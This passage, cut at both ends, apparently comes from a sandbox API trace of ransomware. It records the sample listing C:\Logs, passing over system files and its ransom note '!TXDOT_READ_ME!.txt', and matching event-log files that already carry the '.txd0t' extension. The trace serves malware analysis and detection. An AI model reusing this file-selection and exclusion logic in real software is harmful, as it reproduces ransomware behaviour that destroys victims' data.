ftLastAccessTime.dwLowDateTime=0x59702ac0, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x59702ac0, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0128.921] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0128.921] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0128.921] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.921] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.921] StrNCatW (in: psz1="C:\\Logs\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1040 | out: psz1="C:\\Logs\\!TXDOT_READ_ME!.txt") returned="C:\\Logs\\!TXDOT_READ_ME!.txt" [0128.921] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0128.921] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0128.921] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0128.921] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0128.921] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0128.921] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0128.921] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0128.921] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0128.921] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0128.921] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0128.921] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0128.921] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0128.921] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0128.921] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0128.921] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0128.922] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0128.922] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5052fa31, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5052fa31, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5980dd41, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Application.evtx.txd0t", cAlternateFileName="APPLIC~1.TXD")) returned 1 [0128.922] StrCmpW (psz1="Application.evtx.txd0t", psz2=".") returned 1 [0128.922] StrCmpW (psz1="Application.evtx.txd0t", psz2="..") returned 1 [0128.922] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.922] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.922] StrNCatW (in: psz1="C:\\Logs\\", psz2="Application.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Application.evtx.txd0t") returned="C:\\Logs\\Application.evtx.txd0t" [0128.922] PathFindExtensionW (pszPath="Application.evtx.txd0t") returned=".txd0t" [0128.922] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.922] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x505ee5f0, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x505ee5f0, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x59702ac0, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="HardwareEvents.evtx.txd0t", cAlternateFileName="HARDWA~1.TXD")) returned 1 [0128.922] StrCmpW (psz1="HardwareEvents.evtx.txd0t", psz2=".") returned 1 [0128.922] StrCmpW (psz1="HardwareEvents.evtx.txd0t", psz2="..") returned 1 [0128.922] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.922] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.922] StrNCatW (in: psz1="C:\\Logs\\", psz2="HardwareEvents.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\HardwareEvents.evtx.txd0t") returned="C:\\Logs\\HardwareEvents.evtx.txd0t" [0128.922] PathFindExtensionW (pszPath="HardwareEvents.evtx.txd0t") returned=".txd0t" [0128.922] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.922] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x505a2134, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x505a2134, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x59833cec, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Internet Explorer.evtx.txd0t", cAlternateFileName="INTERN~1.TXD")) returned 1 [0128.922] StrCmpW (psz1="Internet Explorer.evtx.txd0t", psz2=".") returned 1 [0128.922] StrCmpW (psz1="Internet Explorer.evtx.txd0t", psz2="..") returned 1 [0128.922] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.922] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.922] StrNCatW (in: psz1="C:\\Logs\\", psz2="Internet Explorer.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Internet Explorer.evtx.txd0t") returned="C:\\Logs\\Internet Explorer.evtx.txd0t" [0128.922] PathFindExtensionW (pszPath="Internet Explorer.evtx.txd0t") returned=".txd0t" [0128.922] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.922] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5057bed8, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5057bed8, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x59728c0e, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Key Management Service.evtx.txd0t", cAlternateFileName="KEYMAN~1.TXD")) returned 1 [0128.922] StrCmpW (psz1="Key Management Service.evtx.txd0t", psz2=".") returned 1 [0128.922] StrCmpW (psz1="Key Management Service.evtx.txd0t", psz2="..") returned 1 [0128.922] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.922] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.922] StrNCatW (in: psz1="C:\\Logs\\", psz2="Key Management Service.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Key Management Service.evtx.txd0t") returned="C:\\Logs\\Key Management Service.evtx.txd0t" [0128.922] PathFindExtensionW (pszPath="Key Management Service.evtx.txd0t") returned=".txd0t" [0128.922] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.923] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc1dbd7c, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcc1dbd7c, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5974eff9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Client-Licensing-Platform%4Admin.evtx.txd0t", cAlternateFileName="MICROS~1.TXD")) returned 1 [0128.923] StrCmpW (psz1="Microsoft-Client-Licensing-Platform%4Admin.evtx.txd0t", psz2=".") returned 1 [0128.923] StrCmpW (psz1="Microsoft-Client-Licensing-Platform%4Admin.evtx.txd0t", psz2="..") returned 1 [0128.923] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.923] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.923] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Client-Licensing-Platform%4Admin.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx.txd0t") returned="C:\\Logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx.txd0t" [0128.923] PathFindExtensionW (pszPath="Microsoft-Client-Licensing-Platform%4Admin.evtx.txd0t") returned=".txd0t" [0128.923] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.923] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca5d836e, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xca5d836e, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x5974eff9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx.txd0t", cAlternateFileName="MICROS~2.TXD")) returned 1 [0128.923] StrCmpW (psz1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx.txd0t", psz2=".") returned 1 [0128.923] StrCmpW (psz1="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx.txd0t", psz2="..") returned 1 [0128.923] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.923] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.923] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx.txd0t" [0128.923] PathFindExtensionW (pszPath="Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx.txd0t") returned=".txd0t" [0128.923] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.923] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9206ac5, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc9206ac5, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x597c25c7, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x101200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx.txd0t", cAlternateFileName="MICROS~3.TXD")) returned 1 [0128.923] StrCmpW (psz1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx.txd0t", psz2=".") returned 1 [0128.923] StrCmpW (psz1="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx.txd0t", psz2="..") returned 1 [0128.923] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.923] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.923] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx.txd0t" [0128.923] PathFindExtensionW (pszPath="Microsoft-Windows-ApplicationResourceManagementSystem%4Operational.evtx.txd0t") returned=".txd0t" [0128.923] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.923] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4143825, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4143825, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x59833cec, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-AppLocker%4EXE and DLL.evtx.txd0t", cAlternateFileName="MICROS~4.TXD")) returned 1 [0128.923] StrCmpW (psz1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx.txd0t", psz2=".") returned 1 [0128.923] StrCmpW (psz1="Microsoft-Windows-AppLocker%4EXE and DLL.evtx.txd0t", psz2="..") returned 1 [0128.923] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.923] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.923] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-AppLocker%4EXE and DLL.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-AppLocker%4EXE and DLL.evtx.txd0t" [0128.923] PathFindExtensionW (pszPath="Microsoft-Windows-AppLocker%4EXE and DLL.evtx.txd0t") returned=".txd0t" [0128.923] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.923] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4169a7a, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4169a7a, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x599d774c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-AppLocker%4MSI and Script.evtx.txd0t", cAlternateFileName="MIF88B~1.TXD")) returned 1 [0128.923] StrCmpW (psz1="Microsoft-Windows-AppLocker%4MSI and Script.evtx.txd0t", psz2=".") returned 1 [0128.923] StrCmpW (psz1="Microsoft-Windows-AppLocker%4MSI and Script.evtx.txd0t", psz2="..") returned 1 [0128.924] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.924] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.924] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-AppLocker%4MSI and Script.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx.txd0t" [0128.924] PathFindExtensionW (pszPath="Microsoft-Windows-AppLocker%4MSI and Script.evtx.txd0t") returned=".txd0t" [0128.924] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.924] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd418fcc3, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd418fcc3, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x59833cec, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx.txd0t", cAlternateFileName="MI3F07~1.TXD")) returned 1 [0128.924] StrCmpW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx.txd0t", psz2=".") returned 1 [0128.924] StrCmpW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx.txd0t", psz2="..") returned 1 [0128.924] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.924] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.924] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx.txd0t" [0128.924] PathFindExtensionW (pszPath="Microsoft-Windows-AppLocker%4Packaged app-Deployment.evtx.txd0t") returned=".txd0t" [0128.924] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.924] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd418fcc3, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd418fcc3, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x59859f59, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx.txd0t", cAlternateFileName="MI388C~1.TXD")) returned 1 [0128.924] StrCmpW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx.txd0t", psz2=".") returned 1 [0128.924] StrCmpW (psz1="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx.txd0t", psz2="..") returned 1 [0128.924] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.924] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.924] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx.txd0t" [0128.924] PathFindExtensionW (pszPath="Microsoft-Windows-AppLocker%4Packaged app-Execution.evtx.txd0t") returned=".txd0t" [0128.924] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.924] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd41b5f2d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd41b5f2d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x59880168, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-AppModel-Runtime%4Admin.evtx.txd0t", cAlternateFileName="MIA697~1.TXD")) returned 1 [0128.924] StrCmpW (psz1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx.txd0t", psz2=".") returned 1 [0128.924] StrCmpW (psz1="Microsoft-Windows-AppModel-Runtime%4Admin.evtx.txd0t", psz2="..") returned 1 [0128.924] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.924] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.924] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-AppModel-Runtime%4Admin.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx.txd0t" [0128.924] PathFindExtensionW (pszPath="Microsoft-Windows-AppModel-Runtime%4Admin.evtx.txd0t") returned=".txd0t" [0128.924] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.924] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd389efbd, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd389efbd, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x598a6465, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-AppReadiness%4Admin.evtx.txd0t", cAlternateFileName="MI0A82~1.TXD")) returned 1 [0128.924] StrCmpW (psz1="Microsoft-Windows-AppReadiness%4Admin.evtx.txd0t", psz2=".") returned 1 [0128.924] StrCmpW (psz1="Microsoft-Windows-AppReadiness%4Admin.evtx.txd0t", psz2="..") returned 1 [0128.924] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.924] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.924] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-AppReadiness%4Admin.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx.txd0t" [0128.925] PathFindExtensionW (pszPath="Microsoft-Windows-AppReadiness%4Admin.evtx.txd0t") returned=".txd0t" [0128.925] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.925] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd38c5212, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd38c5212, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x59918b0f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x111200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-AppReadiness%4Operational.evtx.txd0t", cAlternateFileName="MI1D55~1.TXD")) returned 1 [0128.925] StrCmpW (psz1="Microsoft-Windows-AppReadiness%4Operational.evtx.txd0t", psz2=".") returned 1 [0128.925] StrCmpW (psz1="Microsoft-Windows-AppReadiness%4Operational.evtx.txd0t", psz2="..") returned 1 [0128.925] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.925] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.925] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-AppReadiness%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-AppReadiness%4Operational.evtx.txd0t" [0128.925] PathFindExtensionW (pszPath="Microsoft-Windows-AppReadiness%4Operational.evtx.txd0t") returned=".txd0t" [0128.925] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.925] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4143825, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4143825, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x59c861d3, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-AppXDeployment%4Operational.evtx.txd0t", cAlternateFileName="MI7CA9~1.TXD")) returned 1 [0128.925] StrCmpW (psz1="Microsoft-Windows-AppXDeployment%4Operational.evtx.txd0t", psz2=".") returned 1 [0128.925] StrCmpW (psz1="Microsoft-Windows-AppXDeployment%4Operational.evtx.txd0t", psz2="..") returned 1 [0128.925] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.925] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0128.925] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-AppXDeployment%4Operational.evtx.txd0t", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx.txd0t") returned="C:\\Logs\\Microsoft-Windows-AppXDeployment%4Operational.evtx.txd0t" [0128.925] PathFindExtensionW (pszPath="Microsoft-Windows-AppXDeployment%4Operational.evtx.txd0t") returned=".txd0t" [0128.925] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.925] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5af3554f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5af3554f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x599b1edc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x211200, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx.txd0t", cAlternateFileName="MIF836~1.TXD")) returned 1 [0128.925] StrCmpW (psz1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx.txd0t", psz2=".") returned 1 [0128.925] StrCmpW (psz1="Microsoft-Windows-AppXDeploymentServer%4Operational.evtx.txd0t", psz2="..") returned 1 [0128.925] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0128.925] StrNCatW (in: 